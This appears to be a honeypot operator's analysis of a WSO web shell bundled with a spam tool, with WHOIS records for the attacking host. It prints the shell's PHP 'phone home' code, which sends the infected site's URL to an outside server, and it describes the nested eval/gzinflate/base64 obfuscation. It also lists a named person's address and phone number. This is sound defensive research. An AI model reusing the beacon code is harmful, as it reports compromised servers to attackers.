An Email spamming tool layered on top of an instance of the WSO web shell. There's also a little chunk of "phone home" code:
if (file_exists('data.bin')==false){
$url = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
file_get_contents("http://3x.od.ua/shell/index.php?shell=".base64_encode($url));
$fp1 = fopen("data.bin", "w");
fclose($fp1);
}
Sends URL of db-config.php to a Ukrainian web site.
Leaves an empty file named "data.bin" lying around.
My honey pot caught another one of these 2019-11-14. Essentially unchanged.
person: Vilko Damianov
address: 4000, Bulgaria, Plovdiv, 2 Lyuben Karavelov, unit 5
phone: +35932571279
nic-hdl: VD3206-RIPE
mnt-by: HZ-HOSTING-LTD
created: 2016-11-28T15:25:07Z
last-modified: 2016-11-28T15:25:07Z
source: RIPE
% Information related to '5.149.250.0/23AS61046'
route: 5.149.250.0/23
descr: HZ-HOSTING-LTD
origin: AS61046
mnt-by: HZ-HOSTING-LTD
created: 2013-03-05T14:08:17Z
last-modified: 2016-11-28T19:10:21Z
source: RIPE
5.149.250.196 is apparently located in London, UK.
Downloaded to a fake WSO web shell, part of a WordPress honey pot. Part of a larger campaign of maybe re-corrupting a WordPress site, that someone else had previously installed WSO on.
Did a string of hand edits and executes:
5.149.250.196WjcyqoD-WcEZBqVmxA8u7wAAAAA.0.file→dc1.phpdc1.php→dc2.phpdc2.php→dc3.phpdc3.php→dc4.phpdc4.php→dc5.phpdc5.php→dc6.phpdc6.php→dc8.phpdc8.php→dc9.php
In each case, I had to replace eval with print, and possibly add a "<?php" opening tag.
Some automated encoding program must exist, which has a choice of how many layers of about 3 different obfuscation methods you want applied.
File dc9.php has the code that a correct invocation of its URL would execute, after the 8 or 9 levels of eval(gzinflate(base64_decode())) get executed.